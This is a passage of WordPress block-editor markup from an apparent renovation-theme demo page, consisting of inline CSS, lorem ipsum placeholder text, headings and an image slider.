0.2); }\n</style><style type=\"text/css\"> .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ebd450c2-fa0b-4c48-a797-e737001ccee6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ebd450c2-fa0b-4c48-a797-e737001ccee6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"06ef029a-8637-4395-a64b-483f5f811257\"} -->\n<style type=\"text/css\"> .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-06ef029a-8637-4395-a64b-483f5f811257 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-06ef029a-8637-4395-a64b-483f5f811257 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"34c8452e-0e0d-4c6e-96ef-39c175a05300\"} -->\n<style type=\"text/css\"> .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-34c8452e-0e0d-4c6e-96ef-39c175a05300 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-34c8452e-0e0d-4c6e-96ef-39c175a05300\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"eb6de03a-74f8-4aef-92d8-b525be50346e\"} -->\n<style type=\"text/css\"> .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-eb6de03a-74f8-4aef-92d8-b525be50346e .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-eb6de03a-74f8-4aef-92d8-b525be50346e\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ca4fc87f-f20c-4b21-bbcc-fe8c2e9e5517\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a1ffc371-4c61-48a2-b162-a9b2e12f6fe6\"} -->\n<style type=\"text/css\"> .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a1ffc371-4c61-48a2-b162-a9b2e12f6fe6 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"c65549f2-71d5-48aa-9a59-33412c5811e2\"} -->\n<style type=\"text/css\"> .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c65549f2-71d5-48aa-9a59-33412c5811e2 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c65549f2-71d5-48aa-9a59-33412c5811e2\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"175a3c84-3dfb-4d11-904d-78dafbac1c4b\"} -->\n<style type=\"text/css\"> .block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-175a3c84-3dfb-4d11-904d-78dafbac1c4b is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"df1b904e-a10f-44aa-b563-c465d6e1668c\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-df1b904e-a10f-44aa-b563-c465d6e1668c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"391c8d5a-7ec7-4711-8aa0-de038f503374\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-391c8d5a-7ec7-4711-8aa0-de038f503374 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"3974ece1-6417-40c4-a023-a498481ada97\"} -->\n<style type=\"text/css\"> .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3974ece1-6417-40c4-a023-a498481ada97 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"c7fcd398-33f3-4e55-90b5-edaeb87e38e7\"} -->\n<style type=\"text/css\"> 